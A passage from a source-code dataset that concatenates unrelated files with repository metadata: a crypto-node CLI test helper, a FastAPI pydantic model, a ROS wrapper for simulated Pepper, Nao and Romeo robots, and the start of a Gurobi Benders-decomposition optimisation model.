        # JSONRPCException it raised (mirrors the JSON-RPC batch format).
        results = []
        for request in requests:
            try:
                results.append(dict(result=request()))
            except JSONRPCException as e:
                results.append(dict(error=e))
        return results
    def send_cli(self, command=None, *args, **kwargs):
        """Run rpicoin-cli command. Deserializes returned string as python object."""
        pos_args = [str(arg) for arg in args]
        named_args = [str(key) + "=" + str(value) for (key, value) in kwargs.items()]
        assert not (pos_args and named_args), "Cannot use positional arguments and named arguments in the same rpicoin-cli call"
        p_args = [self.binary, "-datadir=" + self.datadir] + self.options
        if named_args:
            p_args += ["-named"]
        if command is not None:
            p_args += [command]
        p_args += pos_args + named_args
        self.log.debug("Running bitcoin-cli command: %s" % command)
        process = subprocess.Popen(p_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True)
        cli_stdout, cli_stderr = process.communicate(input=self.input)
        returncode = process.poll()
        if returncode:
            # Translate the cli's "error code/error message" stderr format
            # back into a JSONRPCException, like a direct RPC call would raise.
            match = re.match(r'error code: ([-0-9]+)\nerror message:\n(.*)', cli_stderr)
            if match:
                code, message = match.groups()
                raise JSONRPCException(dict(code=int(code), message=message))
            # Ignore cli_stdout, raise with cli_stderr
            raise subprocess.CalledProcessError(returncode, self.binary, output=cli_stderr)
        try:
            return json.loads(cli_stdout, parse_float=decimal.Decimal)
        except JSONDecodeError:
            # Non-JSON output (e.g. plain help text) is returned as a string.
            return cli_stdout.rstrip("\n")
| 38.557491 | 248 | 0.627688 |
4f543ec6a11d443c275af232d3a2ebe38b8a5ed2 | 485 | py | Python | backend/app/models/project.py | tsugden/fastapi-react-docker | db187e27ee90f450a49bfbb773769387b262eef9 | [
"MIT"
] | 1 | 2021-06-09T14:01:52.000Z | 2021-06-09T14:01:52.000Z | backend/app/models/project.py | tsugden/fastapi-react-docker | db187e27ee90f450a49bfbb773769387b262eef9 | [
"MIT"
] | null | null | null | backend/app/models/project.py | tsugden/fastapi-react-docker | db187e27ee90f450a49bfbb773769387b262eef9 | [
"MIT"
] | null | null | null | import uuid
from pydantic import BaseModel, Field
class ProjectModel(BaseModel):
    # Document id, aliased to "_id" (MongoDB primary-key convention).
    # NOTE(review): default_factory=uuid.uuid4 returns a UUID instance, not a
    # str, and pydantic v1 does not validate/coerce defaults by default —
    # confirm the stored id has the intended type (a
    # ``lambda: str(uuid.uuid4())`` factory would guarantee a str).
    id: str = Field(default_factory=uuid.uuid4, alias="_id")
    name: str = Field(...)
    nickname: str = Field(...)
    class Config:
        # Allow populating by field name ("id") as well as alias ("_id").
        allow_population_by_field_name = True
        # Example payload shown in the generated OpenAPI/Swagger docs.
        schema_extra = {
            "example": {
                "id": "00010203-0405-0607-0809-0a0b0c0d0e0f",
                "name": "News of the World",
                "nickname": "notw",
            }
        }
| 24.25 | 61 | 0.548454 |
ebcbc10af7bfa0bf9db50b8d2fd34052ef120ff3 | 28,739 | py | Python | qibullet/ros_wrapper.py | lubiluk/qibullet | 46b7f3a6f1672185233bbe5be545a8b176bc9127 | [
"Apache-2.0"
] | null | null | null | qibullet/ros_wrapper.py | lubiluk/qibullet | 46b7f3a6f1672185233bbe5be545a8b176bc9127 | [
"Apache-2.0"
] | null | null | null | qibullet/ros_wrapper.py | lubiluk/qibullet | 46b7f3a6f1672185233bbe5be545a8b176bc9127 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
import os
import sys
import atexit
import pybullet
from qibullet.camera import Camera
from qibullet.camera import CameraRgb
from qibullet.camera import CameraDepth
from qibullet.nao_virtual import NaoVirtual
from qibullet.romeo_virtual import RomeoVirtual
from qibullet.pepper_virtual import PepperVirtual
from qibullet.base_controller import PepperBaseController
from threading import Thread
try:
import rospy
import roslib
import roslaunch
import tf2_ros
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from sensor_msgs.msg import CameraInfo
from sensor_msgs.msg import JointState
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Header
from std_msgs.msg import Empty
from naoqi_bridge_msgs.msg import JointAnglesWithSpeed
from geometry_msgs.msg import TransformStamped
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
try:
from naoqi_bridge_msgs.msg import PoseStampedWithSpeed as MovetoPose
OFFICIAL_DRIVER = False
print("Using softbankrobotics-research forked version of NAOqi driver")
except ImportError as e:
from geometry_msgs.msg import PoseStamped as MovetoPose
OFFICIAL_DRIVER = True
MISSING_IMPORT = None
except ImportError as e:
MISSING_IMPORT = str(e)
class RosWrapper:
    """
    Virtual class defining the basis of a robot ROS wrapper
    """
    def __init__(self):
        """
        Constructor
        """
        if MISSING_IMPORT is not None:
            raise pybullet.error(MISSING_IMPORT)
        self.spin_thread = None
        self._wrapper_termination = False
        self.image_bridge = CvBridge()
        self.roslauncher = None
        self.transform_broadcaster = tf2_ros.TransformBroadcaster()
        atexit.register(self.stopWrapper)
    def stopWrapper(self):
        """
        Stops the ROS wrapper
        """
        self._wrapper_termination = True
        try:
            assert self.spin_thread is not None
            assert isinstance(self.spin_thread, Thread)
            # FIX: Thread.isAlive() was removed in Python 3.9; is_alive() is
            # the supported spelling (available since Python 2.6).
            assert self.spin_thread.is_alive()
            self.spin_thread.join()
        except AssertionError:
            pass
        if self.roslauncher is not None:
            self.roslauncher.stop()
            print("Stopping roslauncher")
    def launchWrapper(self, virtual_robot, ros_namespace, frequency=200):
        """
        Launches the ROS wrapper

        Parameters:
            virtual_robot - The instance of the simulated model
            ros_namespace - The ROS namespace to be added before the ROS topics
            advertized and subscribed
            frequency - The frequency of the ROS rate that will be used to pace
            the wrapper's main loop
        """
        if MISSING_IMPORT is not None:
            raise pybullet.error(MISSING_IMPORT)
        self.robot = virtual_robot
        self.ros_namespace = ros_namespace
        self.frequency = frequency
        rospy.init_node(
            "qibullet_wrapper",
            anonymous=True,
            disable_signals=False)
        # Upload the robot description to the ros parameter server
        try:
            if isinstance(self.robot, PepperVirtual):
                robot_name = "pepper"
            elif isinstance(self.robot, NaoVirtual):
                robot_name = "nao"
            elif isinstance(self.robot, RomeoVirtual):
                robot_name = "romeo"
            else:
                raise pybullet.error(
                    "Unknown robot type, wont set robot description")
            package_path = roslib.packages.get_pkg_dir("naoqi_driver")
            urdf_path = package_path + "/share/urdf/" + robot_name + ".urdf"
            with open(urdf_path, 'r') as file:
                robot_description = file.read()
            rospy.set_param("/robot_description", robot_description)
        except IOError as e:
            raise pybullet.error(
                "Could not retrieve robot descrition: " + str(e))
        # Launch the robot state publisher
        robot_state_publisher = roslaunch.core.Node(
            "robot_state_publisher",
            "robot_state_publisher")
        self.roslauncher = roslaunch.scriptapi.ROSLaunch()
        self.roslauncher.start()
        self.roslauncher.launch(robot_state_publisher)
        # Initialize the ROS publisher and subscribers
        self._initPublishers()
        self._initSubscribers()
        # Launch the wrapper's main loop
        self._wrapper_termination = False
        self.spin_thread = Thread(target=self._spin)
        self.spin_thread.start()
    def _initPublishers(self):
        """
        ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
        class. Initializes the ROS publishers
        """
        raise NotImplementedError
    def _initSubscribers(self):
        """
        ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
        class. Initializes the ROS subscribers
        """
        raise NotImplementedError
    def _spin(self):
        """
        ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
        class. Designed to emulate a ROS spin method
        """
        raise NotImplementedError
    def _broadcastOdometry(self, odometry_publisher):
        """
        INTERNAL METHOD, computes an odometry message based on the robot's
        position, and broadcast it

        Parameters:
            odometry_publisher - The ROS publisher for the odometry message
        """
        # Send Transform odom
        x, y, theta = self.robot.getPosition()
        odom_trans = TransformStamped()
        odom_trans.header.frame_id = "odom"
        odom_trans.child_frame_id = "base_link"
        odom_trans.header.stamp = rospy.get_rostime()
        odom_trans.transform.translation.x = x
        odom_trans.transform.translation.y = y
        odom_trans.transform.translation.z = 0
        quaternion = pybullet.getQuaternionFromEuler([0, 0, theta])
        odom_trans.transform.rotation.x = quaternion[0]
        odom_trans.transform.rotation.y = quaternion[1]
        odom_trans.transform.rotation.z = quaternion[2]
        odom_trans.transform.rotation.w = quaternion[3]
        self.transform_broadcaster.sendTransform(odom_trans)
        # Set up the odometry
        odom = Odometry()
        odom.header.stamp = rospy.get_rostime()
        odom.header.frame_id = "odom"
        odom.pose.pose.position.x = x
        odom.pose.pose.position.y = y
        odom.pose.pose.position.z = 0.0
        odom.pose.pose.orientation = odom_trans.transform.rotation
        odom.child_frame_id = "base_link"
        [vx, vy, vz], [wx, wy, wz] = pybullet.getBaseVelocity(
            self.robot.getRobotModel(),
            self.robot.getPhysicsClientId())
        odom.twist.twist.linear.x = vx
        odom.twist.twist.linear.y = vy
        odom.twist.twist.angular.z = wz
        odometry_publisher.publish(odom)
    def _broadcastCamera(self, camera, image_publisher, info_publisher):
        """
        INTERNAL METHOD, computes the image message and the info message of the
        given camera and publishes them into the ROS framework

        Parameters:
            camera - The camera used for broadcasting
            image_publisher - The ROS publisher for the Image message,
            corresponding to the image delivered by the active camera
            info_publisher - The ROS publisher for the CameraInfo message,
            corresponding to the parameters of the active camera
        """
        try:
            frame = camera.getFrame()
            assert frame is not None
            # Fill the camera info message
            info_msg = CameraInfo()
            info_msg.distortion_model = "plumb_bob"
            info_msg.header.frame_id = camera.getCameraLink().getName()
            info_msg.width = camera.getResolution().width
            info_msg.height = camera.getResolution().height
            info_msg.D = [0.0, 0.0, 0.0, 0.0, 0.0]
            info_msg.K = camera._getCameraIntrinsics()
            info_msg.R = [1, 0, 0, 0, 1, 0, 0, 0, 1]
            # Projection matrix P = [K | 0] (no translation between frames)
            info_msg.P = list(info_msg.K)
            info_msg.P.insert(3, 0.0)
            info_msg.P.insert(7, 0.0)
            info_msg.P.append(0.0)
            # Fill the image message
            image_msg = self.image_bridge.cv2_to_imgmsg(frame)
            image_msg.header.frame_id = camera.getCameraLink().getName()
            # Check if the retrieved image is RGB or a depth image
            if isinstance(camera, CameraDepth):
                image_msg.encoding = "16UC1"
            else:
                image_msg.encoding = "bgr8"
            # Publish the image and the camera info
            image_publisher.publish(image_msg)
            info_publisher.publish(info_msg)
        except AssertionError:
            pass
    def _broadcastJointState(self, joint_state_publisher, extra_joints=None):
        """
        INTERNAL METHOD, publishes the state of the robot's joints into the ROS
        framework

        Parameters:
            joint_state_publisher - The ROS publisher for the JointState
            message, describing the state of the robot's joints
            extra_joints - A dict, describing extra joints to be published. The
            dict should respect the following syntax:
            {"joint_name": joint_value, ...}
        """
        msg_joint_state = JointState()
        msg_joint_state.header = Header()
        msg_joint_state.header.stamp = rospy.get_rostime()
        msg_joint_state.name = list(self.robot.joint_dict)
        msg_joint_state.position = self.robot.getAnglesPosition(
            msg_joint_state.name)
        try:
            assert isinstance(extra_joints, dict)
            for name, value in extra_joints.items():
                msg_joint_state.name += [name]
                msg_joint_state.position += [value]
        except AssertionError:
            pass
        joint_state_publisher.publish(msg_joint_state)
    def _jointAnglesCallback(self, msg):
        """
        INTERNAL METHOD, callback triggered when a message is received on the
        /joint_angles topic

        Parameters:
            msg - a ROS message containing a pose stamped with a speed
            associated to it. The type of the message is the following:
            naoqi_bridge_msgs::JointAnglesWithSpeed. That type can be found in
            the ros naoqi software stack
        """
        joint_list = msg.joint_names
        position_list = list(msg.joint_angles)
        # If the "non official" driver (softbankrobotics-research fork) is
        # used, will try to detect if multiple speeds have been provided. If
        # not, or if the "official" driver is used, the speed attribute of the
        # message will be used
        try:
            assert not OFFICIAL_DRIVER
            if len(msg.speeds) != 0:
                velocity = list(msg.speeds)
            else:
                velocity = msg.speed
        except AssertionError:
            velocity = msg.speed
        self.robot.setAngles(joint_list, position_list, velocity)
class NaoRosWrapper(RosWrapper):
    """
    Class describing a ROS wrapper for the virtual model of Nao, inheriting
    from the RosWrapperClass
    """
    def __init__(self):
        """
        Constructor
        """
        RosWrapper.__init__(self)
    def launchWrapper(self, virtual_nao, ros_namespace, frequency=200):
        """
        Launches the ROS wrapper for the virtual_nao instance

        Parameters:
            virtual_nao - The instance of the simulated model
            ros_namespace - The ROS namespace to be added before the ROS topics
            advertized and subscribed
            frequency - The frequency of the ROS rate that will be used to pace
            the wrapper's main loop
        """
        RosWrapper.launchWrapper(
            self,
            virtual_nao,
            ros_namespace,
            frequency)
    def _initPublishers(self):
        """
        INTERNAL METHOD, initializes the ROS publishers
        """
        # Camera topics are namespaced; /joint_states and odom are global so
        # that robot_state_publisher and nav tools find them.
        self.front_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/front/image_raw',
            Image,
            queue_size=10)
        self.front_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/front/camera_info',
            CameraInfo,
            queue_size=10)
        self.bottom_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/bottom/image_raw',
            Image,
            queue_size=10)
        self.bottom_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/bottom/camera_info',
            CameraInfo,
            queue_size=10)
        self.joint_states_pub = rospy.Publisher(
            '/joint_states',
            JointState,
            queue_size=10)
        self.odom_pub = rospy.Publisher(
            'odom',
            Odometry,
            queue_size=10)
    def _initSubscribers(self):
        """
        INTERNAL METHOD, initializes the ROS subscribers
        """
        rospy.Subscriber(
            '/joint_angles',
            JointAnglesWithSpeed,
            self._jointAnglesCallback)
    def _broadcastCamera(self):
        """
        INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
        """
        # Only cameras subscribed in the simulation are broadcast.
        if self.robot.camera_dict[NaoVirtual.ID_CAMERA_TOP].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[NaoVirtual.ID_CAMERA_TOP],
                self.front_cam_pub,
                self.front_info_pub)
        if self.robot.camera_dict[NaoVirtual.ID_CAMERA_BOTTOM].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[NaoVirtual.ID_CAMERA_BOTTOM],
                self.bottom_cam_pub,
                self.bottom_info_pub)
    def _broadcastJointState(self, joint_state_publisher):
        """
        INTERNAL METHOD, publishes the state of the robot's joints into the ROS
        framework, overloading @_broadcastJointState in RosWrapper

        Parameters:
            joint_state_publisher - The ROS publisher for the JointState
            message, describing the state of the robot's joints (for API
            consistency)
        """
        RosWrapper._broadcastJointState(self, joint_state_publisher)
    def _spin(self):
        """
        INTERNAL METHOD, designed to emulate a ROS spin method
        """
        rate = rospy.Rate(self.frequency)
        try:
            while not self._wrapper_termination:
                rate.sleep()
                self._broadcastJointState(self.joint_states_pub)
                self._broadcastOdometry(self.odom_pub)
                self._broadcastCamera()
        # Broad catch: any broadcast failure ends the loop and is reported once.
        except Exception as e:
            print("Stopping the ROS wrapper: " + str(e))
class RomeoRosWrapper(RosWrapper):
    """
    Class describing a ROS wrapper for the virtual model of Romeo, inheriting
    from the RosWrapperClass
    """
    def __init__(self):
        """
        Constructor
        """
        RosWrapper.__init__(self)
    def launchWrapper(self, virtual_romeo, ros_namespace, frequency=200):
        """
        Launches the ROS wrapper for the virtual_romeo instance

        Parameters:
            virtual_romeo - The instance of the simulated model
            ros_namespace - The ROS namespace to be added before the ROS topics
            advertized and subscribed
            frequency - The frequency of the ROS rate that will be used to pace
            the wrapper's main loop
        """
        RosWrapper.launchWrapper(
            self,
            virtual_romeo,
            ros_namespace,
            frequency)
    def _initPublishers(self):
        """
        INTERNAL METHOD, initializes the ROS publishers
        """
        # Romeo exposes a stereo pair (right/left) plus a depth camera.
        self.right_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/right/image_raw',
            Image,
            queue_size=10)
        self.right_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/right/camera_info',
            CameraInfo,
            queue_size=10)
        self.left_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/left/image_raw',
            Image,
            queue_size=10)
        self.left_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/left/camera_info',
            CameraInfo,
            queue_size=10)
        self.depth_cam_pub = rospy.Publisher(
            self.ros_namespace + '/camera/depth/image_raw',
            Image,
            queue_size=10)
        self.depth_info_pub = rospy.Publisher(
            self.ros_namespace + '/camera/depth/camera_info',
            CameraInfo,
            queue_size=10)
        self.joint_states_pub = rospy.Publisher(
            '/joint_states',
            JointState,
            queue_size=10)
        self.odom_pub = rospy.Publisher(
            'odom',
            Odometry,
            queue_size=10)
    def _initSubscribers(self):
        """
        INTERNAL METHOD, initializes the ROS subscribers
        """
        rospy.Subscriber(
            '/joint_angles',
            JointAnglesWithSpeed,
            self._jointAnglesCallback)
    def _broadcastCamera(self):
        """
        INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
        """
        # Only cameras subscribed in the simulation are broadcast.
        if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_RIGHT].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[RomeoVirtual.ID_CAMERA_RIGHT],
                self.right_cam_pub,
                self.right_info_pub)
        if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_LEFT].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[RomeoVirtual.ID_CAMERA_LEFT],
                self.left_cam_pub,
                self.left_info_pub)
        if self.robot.camera_dict[RomeoVirtual.ID_CAMERA_DEPTH].isActive():
            RosWrapper._broadcastCamera(
                self,
                self.robot.camera_dict[RomeoVirtual.ID_CAMERA_DEPTH],
                self.depth_cam_pub,
                self.depth_info_pub)
    def _broadcastJointState(self, joint_state_publisher):
        """
        INTERNAL METHOD, publishes the state of the robot's joints into the ROS
        framework, overloading @_broadcastJointState in RosWrapper

        Parameters:
            joint_state_publisher - The ROS publisher for the JointState
            message, describing the state of the robot's joints (for API
            consistency)
        """
        RosWrapper._broadcastJointState(self, joint_state_publisher)
    def _spin(self):
        """
        INTERNAL METHOD, designed to emulate a ROS spin method
        """
        rate = rospy.Rate(self.frequency)
        try:
            while not self._wrapper_termination:
                rate.sleep()
                self._broadcastJointState(self.joint_states_pub)
                self._broadcastOdometry(self.odom_pub)
                self._broadcastCamera()
        # Broad catch: any broadcast failure ends the loop and is reported once.
        except Exception as e:
            print("Stopping the ROS wrapper: " + str(e))
class PepperRosWrapper(RosWrapper):
"""
Class describing a ROS wrapper for the virtual model of Pepper, inheriting
from the RosWrapperClass
"""
def __init__(self):
"""
Constructor
"""
RosWrapper.__init__(self)
def launchWrapper(self, virtual_pepper, ros_namespace, frequency=200):
"""
Launches the ROS wrapper for the virtual_pepper instance
Parameters:
virtual_pepper - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
RosWrapper.launchWrapper(
self,
virtual_pepper,
ros_namespace,
frequency)
def _initPublishers(self):
"""
INTERNAL METHOD, initializes the ROS publishers
"""
self.front_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/image_raw',
Image,
queue_size=10)
self.front_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/front/camera_info',
CameraInfo,
queue_size=10)
self.bottom_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/image_raw',
Image,
queue_size=10)
self.bottom_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/bottom/camera_info',
CameraInfo,
queue_size=10)
self.depth_cam_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/image_raw',
Image,
queue_size=10)
self.depth_info_pub = rospy.Publisher(
self.ros_namespace + '/camera/depth/camera_info',
CameraInfo,
queue_size=10)
self.laser_pub = rospy.Publisher(
self.ros_namespace + "/laser",
LaserScan,
queue_size=10)
self.joint_states_pub = rospy.Publisher(
'/joint_states',
JointState,
queue_size=10)
self.odom_pub = rospy.Publisher(
'/naoqi_driver/odom',
Odometry,
queue_size=10)
def _initSubscribers(self):
"""
INTERNAL METHOD, initializes the ROS subscribers
"""
rospy.Subscriber(
'/joint_angles',
JointAnglesWithSpeed,
self._jointAnglesCallback)
rospy.Subscriber(
'/cmd_vel',
Twist,
self._velocityCallback)
rospy.Subscriber(
'/move_base_simple/goal',
MovetoPose,
self._moveToCallback)
rospy.Subscriber(
'/move_base_simple/cancel',
Empty,
self._killMoveCallback)
def _broadcastLasers(self, laser_publisher):
"""
INTERNAL METHOD, publishes the laser values in the ROS framework
Parameters:
laser_publisher - The ROS publisher for the LaserScan message,
corresponding to the laser info of the pepper robot (for API
consistency)
"""
if not self.robot.laser_manager.isActive():
return
scan = LaserScan()
scan.header.stamp = rospy.get_rostime()
scan.header.frame_id = "base_footprint"
# -120 degres, 120 degres
scan.angle_min = -2.0944
scan.angle_max = 2.0944
# 240 degres FoV, 61 points (blind zones inc)
scan.angle_increment = (2 * 2.0944) / (15.0 + 15.0 + 15.0 + 8.0 + 8.0)
# Detection ranges for the lasers in meters, 0.1 to 3.0 meters
scan.range_min = 0.1
scan.range_max = 3.0
# Fill the lasers information
right_scan = self.robot.getRightLaserValue()
front_scan = self.robot.getFrontLaserValue()
left_scan = self.robot.getLeftLaserValue()
if isinstance(right_scan, list):
scan.ranges.extend(list(reversed(right_scan)))
scan.ranges.extend([-1]*8)
if isinstance(front_scan, list):
scan.ranges.extend(list(reversed(front_scan)))
scan.ranges.extend([-1]*8)
if isinstance(left_scan, list):
scan.ranges.extend(list(reversed(left_scan)))
laser_publisher.publish(scan)
def _broadcastCamera(self):
"""
INTERNAL METHOD, overloading @_broadcastCamera in RosWrapper
"""
if self.robot.camera_dict[PepperVirtual.ID_CAMERA_TOP].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[PepperVirtual.ID_CAMERA_TOP],
self.front_cam_pub,
self.front_info_pub)
if self.robot.camera_dict[PepperVirtual.ID_CAMERA_BOTTOM].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[PepperVirtual.ID_CAMERA_BOTTOM],
self.bottom_cam_pub,
self.bottom_info_pub)
if self.robot.camera_dict[PepperVirtual.ID_CAMERA_DEPTH].isActive():
RosWrapper._broadcastCamera(
self,
self.robot.camera_dict[PepperVirtual.ID_CAMERA_DEPTH],
self.depth_cam_pub,
self.depth_info_pub)
def _broadcastJointState(self, joint_state_publisher):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework, overloading @_broadcastJointState in RosWrapper
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints (for API
consistency)
"""
RosWrapper._broadcastJointState(
self,
joint_state_publisher,
extra_joints={"WheelFL": 0.0, "WheelFR": 0.0, "WheelB": 0.0})
def _velocityCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/cmd_vel topic
Parameters:
msg - a ROS message containing a Twist command
"""
self.robot.move(msg.linear.x, msg.linear.y, msg.angular.z)
def _moveToCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
'/move_base_simple/goal' topic. It allows to move the robot's base
Parameters:
msg - a ROS message containing a pose stamped with a speed, or a
simple pose stamped (depending on which version of the naoqi_driver
is used, the "official" one from ros-naoqi or the "non official"
softbankrobotics-research fork). The type of the message is the
following: geometry_msgs::PoseStamped for the "official",
naoqi_bridge_msgs::PoseStampedWithSpeed for the "non-official".
An alias is given to the message type: MovetoPose
"""
if OFFICIAL_DRIVER:
pose = msg.pose
frame = 0
frame_id = msg.header.frame_id
speed = None
else:
pose = msg.pose_stamped.pose
frame = msg.referenceFrame
frame_id = msg.pose_stamped.header.frame_id
speed = msg.speed_percentage *\
PepperBaseController.MAX_LINEAR_VELOCITY +\
PepperBaseController.MIN_LINEAR_VELOCITY
try:
assert frame not in [
PepperVirtual.FRAME_ROBOT,
PepperVirtual.FRAME_WORLD]
if frame_id == "odom":
frame = PepperVirtual.FRAME_WORLD
elif frame_id == "base_footprint":
frame = PepperVirtual.FRAME_ROBOT
else:
raise pybullet.error(
"Incorrect reference frame for move_base_simple, please "
"modify the content of your message")
except AssertionError:
pass
x = pose.position.x
y = pose.position.y
theta = pybullet.getEulerFromQuaternion([
pose.orientation.x,
pose.orientation.y,
pose.orientation.z,
pose.orientation.w])[-1]
self.robot.moveTo(
x,
y,
theta,
frame=frame,
speed=speed,
_async=True)
    def _killMoveCallback(self, msg):
        """
        INTERNAL METHOD, callback triggered when a message is received on the
        '/move_base_simple/cancel' topic. This callback is used to stop the
        robot's base from moving.

        Parameters:
            msg - an empty ROS message, with the Empty type (unused)
        """
        # A zero-displacement asynchronous moveTo replaces the current move
        # command, which presumably cancels the ongoing motion -- confirm
        # against the moveTo implementation.
        self.robot.moveTo(0, 0, 0, _async=True)
    def _spin(self):
        """
        INTERNAL METHOD, designed to emulate a ROS spin method. Publishes the
        joint state, odometry, laser and camera data at self.frequency Hz
        until self._wrapper_termination becomes True.
        """
        rate = rospy.Rate(self.frequency)
        try:
            while not self._wrapper_termination:
                rate.sleep()
                self._broadcastJointState(self.joint_states_pub)
                self._broadcastOdometry(self.odom_pub)
                self._broadcastLasers(self.laser_pub)
                self._broadcastCamera()
        except Exception as e:
            # Broad catch on purpose: any failure in a broadcast stops the
            # wrapper loop (reported on stdout) instead of killing the
            # hosting thread with an unhandled exception.
            print("Stopping the ROS wrapper: " + str(e))
| 33.495338 | 79 | 0.604196 |
e00abe973d4ee5f4776ffc9372e5d6c5b7c9e293 | 16,419 | py | Python | Benders.py | Warptenhazz/mscThesis | f0af131e5da0662d4a6094acbcbcc475186f46d4 | [
"Unlicense"
] | 2 | 2019-02-27T01:25:51.000Z | 2020-12-21T07:57:32.000Z | Benders.py | Warptenhazz/mscThesis | f0af131e5da0662d4a6094acbcbcc475186f46d4 | [
"Unlicense"
] | null | null | null | Benders.py | Warptenhazz/mscThesis | f0af131e5da0662d4a6094acbcbcc475186f46d4 | [
"Unlicense"
] | 1 | 2021-03-02T07:53:42.000Z | 2021-03-02T07:53:42.000Z | from gurobipy import *
import numpy as np
# scenarioss = [sc1,sc2,sc3,sc4,sc5,sc6,sc7,sc8,sc9,sc10,sc11,sc12]
# for i in scenarioss:
from sc1 import inputBlock, upperPriceBlock, upperPriceForward, priceBlock, costBlock, PricePool, Aconstant
###################################################################################
#Sets
#Hours
t, h1 = multidict({"1": [1],"2": [1],"3": [1],"4": [1],"5": [1]})
#Scenarios
omega, sc = multidict({'1': [1],'2': [1],'3': [1],'4': [1],'5': [1],'6': [1],'7': [1],'8': [1],'9': [1],'10': [1],'11': [1],'12': [1]})
#Blocks in the price-quota curves
i, bl1 = multidict({1: [1], 2: [1],3: [1]})
#Forwards
f, fr = multidict({"Forward 1": [1], "Forward 2": [1]})
#input blocks in forward contracts
j, pb = multidict({"Bajo": [1],"Moderado": [1],"Alto": [1]})
#Clients
l, client = multidict({"Pequeno": [1],"Mediano": [1]})
#Parameters
#targeted profit z_0s
targetedProfit = 1.5
#probability of scenario omega
scenarioProb = {
('1'): 0.083, ('2'): 0.065, ('3'): 0.10, ('4'): 0.20, ('5'): 0.06, ('6'): 0.20, ('7'): 0.10, ('8'): 0.08, ('9'): 0.15, ('10'): 0.18, ('11'): 0.20, ('12'): 0.20}
##################################################################################
#Model
m = Model("complete")
master = Model("Master")
auxiliar = Model("Auxiliar")
#Variables definition
#cost of purchasing from forward contracts in each period omega
costF = auxiliar.addVars(t, name ="cost forward", vtype= GRB.CONTINUOUS)
#net cost of trading in the pool in period t and scenario omega
costP = auxiliar.addVars(t, omega, name = "cost pool", vtype= GRB.CONTINUOUS)
#input purchased from contract f
inputTotalF = auxiliar.addVars(f, name="input from forward contract", vtype= GRB.CONTINUOUS)
#input purchased from the jth block of the forward contracting curve belonging to contract f
inputBlockF = auxiliar.addVars(f, j, obj = 1, name="input from block from forward contract", vtype= GRB.CONTINUOUS)
#input supplied by the retailer to farmer group l in the period t and scenario omega
inputR = auxiliar.addVars(l, t, omega, name="input supplied by the retailer", vtype= GRB.CONTINUOUS)
#input traded in the pool in the period t and scenario omega
inputP = auxiliar.addVars(t, omega, name="input traded in the pool", vtype= GRB.CONTINUOUS)
#selling price settled by the retailer for farmer group l
gammaSellingR = auxiliar.addVars(l, name="price settled by the retailer", vtype= GRB.CONTINUOUS)
#price of the ith interval of the price-quota curve for farmer gruop l
gammaPriceR = auxiliar.addVars(l, i, name ="price of the interval of price-quota curve ", vtype= GRB.CONTINUOUS)
#revenue obtained by the retailer from selling to farmer group l in period t and scenario omega
INR = auxiliar.addVars(l,t,omega, name = "revenue obtained ", vtype= GRB.CONTINUOUS)
#binary variable selling price offered by the retailer to cliente group l belongs to block i of the price-quota curve
A = master.addVars(l,i, name="selling price offered by the retailer to farmer group", vtype=GRB.BINARY)
#Auxiliar variable who storages the profit by scenario
foAux = auxiliar.addVars(omega, name ="Auxiliar variable who storages the profit by scenario - Auxiliar", vtype = GRB.CONTINUOUS)
#Auxiliar variable who storages the profit by scenario
foMaster = master.addVars(omega, name ="Auxiliar variable who storages the profit by scenario - Master", vtype = GRB.CONTINUOUS)
#compute the risk for scenario
riskScenario = master.addVars(omega, name ="risk for scenario", vtype= GRB.CONTINUOUS)
#k(w) is an auxiliary binary variable and equal to 0 of profit(w) > z0 and 1 if profit(w) <= z0
k = master.addVars(omega, name="auxiliary binary variable 2 for calculate risk", vtype = GRB.BINARY)
#risk for scenario in auxiliar problem
dr = auxiliar.addVars(omega, name= "downside risk in auxiliar problem", vtype = GRB.CONTINUOUS)
#EDR for scenario
EDRS = auxiliar.addVars(omega, name="EDR for scenario", vtype = GRB.CONTINUOUS)
#EDR for function objective
EDRZ = []
#zlower for optimality cut
zlower = 1 #master.addVars(name="min value for optimality cut", vtype = GRB.CONTINUOUS)
master.update()
auxiliar.update()
#save the objective function for each model
ofAux = {}
ofMaster = {}
it = 1
##################################################################################
#Constrains for the master problem
#2. The cost of purchasing input through the forward contracts.
def constraint2(priceBlock):
    """Constraint (2): the forward-purchasing cost of each period equals the
    quantity bought in every block of every forward contract times that
    block's price.

